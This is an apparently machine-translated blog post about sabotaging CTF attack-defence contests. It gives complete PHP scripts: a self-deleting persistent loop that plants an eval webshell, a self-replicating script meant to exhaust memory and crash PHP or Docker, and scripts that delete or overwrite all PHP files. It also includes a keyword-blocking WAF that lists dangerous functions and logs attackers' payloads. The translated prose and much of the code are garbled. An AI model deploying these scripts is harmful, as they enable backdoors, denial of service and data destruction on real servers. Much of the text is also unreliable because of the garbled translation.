How to be a whipping stick in a CTF

On how to stir up excrement in the CTF competition

0x00 Preface

Cannot stir excrement the CTF is not good CTF, cannot stir excrement the question is not good topic.

I am very much in favor of Phithon God's word, "competition is the process of competition with others, through various means to prevent opponents to take points I think is also a kind of ability." ”

You can do what other people can't, and that's what you're capable of.

This article is said to stir excrement in the case of Getshell can be carried out!!! Met Phithon Master's "CTF Organizer guide to the fight stir excrement stick" on GG

0x01 Preparation Knowledge

Most of the topics that can be messed up are PHP and need to be getshell. So, the essential PHP syntax is basically just need to understand ~

The next step is to introduce some special PHP built-in functions

Ignore_user_abort ()

Set whether the execution of the script is interrupted when the client disconnects

When PHP is executed as a command-line script, when the script terminal ends, the script is not aborted immediately unless value is set to TRUE, otherwise the script will be aborted if any characters are output.

Ignore_user_abort (1);

Set_time_limit ()

Set the maximum execution time for a script

Sets the time, in seconds, that the script is allowed to run. If this setting is exceeded, the script returns a fatal error. The default value is 30 seconds, or the value that is defined in php.ini max_execution_time if this value exists.

Set_time_limit (0);

Ini_get ()

Gets the value of a configuration option

Returns the value of the configuration option when successful.

Echo ' disable_functions= '. Ini_get (' disable_functions ');

File_put_contents ()

Writes a string to a file

and sequentially call fopen (), fwrite (), and the fclose () function.

File_put_contents ($filename, $content);

File_get_contents ()

Reads the entire file into a string

As with file (), only file_get_contents () reads a file into a string. Reads the contents of length MaxLen at the position specified by the parameter offset. If it fails, file_get_contents () returns FALSE.

Of course, this function can also read the contents of the file through other protocols

File_get_contents ($filename);

File_get_contents ($url);

File_put_contents ()

Writes a string to a file

and sequentially call fopen (), fwrite (), and the fclose () function.

File_put_contents ($filename, $content);

Unlink ()

deleting files

Delete filename. Similar to the unlink () function of Unix C. An error at the e_warning level occurs.

Unlink ($filename);

Add Set_time_limit (0) to your PHP script, and Ignore_user_abort (1), which will be able to do the resident memory.

In this case, you can basically restart PHP.

0x02 The immortal bird that stirs the excrement

no_die_shell.php

<?php

Set_time_limit (0);

Ignore_user_abort (1);

Unlink (__file__);

File_put_contents (__file__, ");

while (1) {

File_put_contents (' path/webshell.php ', ' <?php @eval ($_post["password"]);? > ');

}

?>

The first is to delete themselves, do not let others know, and then in a certain directory cycle of the generation of your Webshell, simply delete ~ ~

0X03, the bomb that stirs the crap.

nuclear_bomb.php

<?php

Set_time_limit (0);

Ignore_user_abort (TRUE);

while (1) {

File_put_contents (Randstr (). PHP ', file_get_content (__file__));

File_get_contents ("HTTP://127.0.0.1/");

}

?>

According to the code, it is not difficult to see the functionality of this script.

After resident memory, enter the dead loop.

Inside the loop is the ability to implement the invalid copy itself and access the Web service.

The result of execution is memory explosion, PHP is GG, serious point, Docker also GG.

0x04 stirs up the death of excrement

del.php

<?php

Set_time_limit (0);

Ignore_user_abort (1);

Array_map (' unlink ', Glob ("some/dir/*.php"));

?>

del_or_change.php

<?php

Set_time_limit (0);

Ignore_user_abort (1);

Unlink (__file__);

function GetFiles ($path) {

foreach (Glob ($path) as $afile) {

if (Is_dir ($afile))

GetFiles ($afile. ' /*.php ');

Else

@file_put_contents ($afile, "#Anything #");

Unlink ($afile);

}

}

while (1) {

GetFiles (__dir__);

Sleep (10);

}

?>

Calendar directory, get all the PHP files, and then as you want to rewrite the content or directly deleted, to see the mood.

There are many ways to go through the calendar directory, but most of these functions are disabled (disable_functions).

Occasionally there are individual slips, such as glob~~ This function is relatively rare. So that's what it's used for.

If you delete a function unlink be banned, rewrite it.

0x05, the WAF that stirs the crap.

I feel this killing device is a bit evil. For the offline race, almost invincible, I do not have any good way to crack.

Disgusting people.

php_waf_and_log_to_txt.php

<?php

error_reporting (0);

Define (' Log_filename ', ' log.txt ');

function WAF ()

{

if (!function_exists (' getallheaders ')) {

function Getallheaders () {

foreach ($_server as $name = = $value) {

if (substr ($name, 0, 5) = = ' Http_ ')

$headers [Str_replace (', '-'), Ucwords (Strtolower (Str_replace (' _ ', ', ' substr ($name, 5))])] = $value;

}

return $headers;

}

}

$get = $_get;

$post = $_post;

$cookie = $_cookie;

$header = Getallheaders ();

$files = $_files;

$ip = $_server["REMOTE_ADDR"];

$method = $_server[' Request_method ');

$filepath = $_server["Script_name"];

Rewirte Shell which uploaded by others

foreach ($_files as $key = = $value) {

$files [$key] [' content '] = file_get_contents ($_files[$key] [' tmp_name ']);

File_put_contents ($_files[$key [' Tmp_name '], "virink");

}

unset ($header [' Accept ']);//fix a bug

$input = Array ("Get" = = $get, "Post" + = $post, "Cookie" = $cookie, "File" and "$files", "Header" and "$header");

Deal with

$pattern = "Select|insert|update|delete|and|or|\ ' |\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|dumpfile|sub| Hex ";

$pattern. = "|file_put_contents|fwrite|curl|system|eval|assert";

$pattern. = "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_ Alter|ini_restore ";

$pattern. = "| ' |dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";

$vpattern = Explode ("|", $pattern);

$bool = false;

foreach ($input as $k = = $v) {

foreach ($vpattern as $value) {

foreach ($v as $kk = = $VV) {

if (Preg_match ("/$value/I", $VV)) {

$bool = true;

Logging ($input);

Break

}

}

if ($bool) break;

}

if ($bool) break;

}

}

function logging ($var) {

File_put_contents (Log_filename, "\ r \ n". Time (). " \ r \ n ". Print_r ($var, True), file_append);

Die () or unset ($_get) or unset ($_post) or unset ($_cookie);

}

WAF ();

?>

This WAF is definitely a big kill in the online offensive game.

It not only intercepts most illegal statements, but also records all of the attack traffic and easily gets the payload of others.

I don't know how the organizers are going to solve the problem with this WAF.

Of course, this WAF should also not be perfect, and add more rules to make him stronger!

And then say, how to load this WAF in combat.

Depending on the permissions, there are different ways to load.

Have root privileges

So, this is simple, write directly in the configuration.

Vim php.ini

Auto_append_file = "/dir/path/phpwaf.php"

Restarting Apache or PHP-FPM will take effect.

Of course, it can also be written in. User.ini or. htaccess.

Php_value auto_prepend_file "/dir/path/phpwaf.php"

Only User permissions

Do not write system permissions can only be on the code above, that is, the file contains.

This clock can also be contained in different ways.

If it is a frame-type application, then it can be added to the portal file, such as index.php,

If it is not a framework app, it can be included in related files such as public Profile config.php.

Include (' phpwaf.php ');

There is also a replacement index.php, that is to say index.php renamed Index2.php, and then phpwaf.php changed to index.php.

Of course, but also in the original phpwaf.php contains the original index.php.

index.php-index2.php

phpwaf.php-index.php

Include (' index2.php ');

As to which way you want to use, look at your mood, you happy is good.

0x06 concluding remarks

The purpose of this article is not to let everyone go to the CTF to stir excrement, after all, CTF is a regular game place, help us learn more technology and black technology.

Of course, the server maintenance staff is also very hard.

We have to hit the problem of the person is good, why difficult operation dimension. (The case of the person is operation, the exception!!!) ）

I hope you can read this article with the correct mentality, "PHP is the best language in the world", there are many places to dig.

Organizers, the table hit me.

How to be a whipping stick in a CTF